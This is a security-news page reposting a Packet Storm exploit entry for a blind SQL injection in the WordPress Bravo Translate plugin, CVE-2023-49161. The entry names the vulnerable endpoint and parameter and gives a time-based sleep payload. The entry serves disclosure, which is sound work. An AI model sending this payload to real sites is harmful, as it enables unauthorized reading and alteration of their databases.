Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress Bravo Translate 1.2 SQL Injection

WordPress Bravo Translate plugin versions 1.2 and below suffer from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#web#windows#linux#js#wordpress#auth
# Exploit Title: WP Plugins Bravo Translate <= 1.2 - SQL Injection# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/bravo-translate/# Version: 1.2# Tested on: Windows, Linux# CVE: CVE-2023-49161# Product DescriptionThis plugin allow you to translate your monolingual website in a super easy manner. You do not have to bother about .pot .po or .mo files. It safes you a lot of time cause you can effectively transalte thouse texts in a foreign language with just a few clicks gaining productivity. Bravo translate keeps your translations in your database. You dont have to worry about themes or plugins updates because your translations will not vannish.# Vulnerability overview:The WordPress Plugins Bravo Translate <= 1.2 is vulnerable to Blind SQL Injection via the textTo parameter on /wp-json/bravo-translate/BRAVOTRAN_create endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of Concept:Affected Endpoint: /wp-json/bravo-translate/BRAVOTRAN_create?textTo=a&yourTranslation=bAffected Parameter: textTopayload: test',(select%20sleep(5)))%23# RecommendationN/A

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution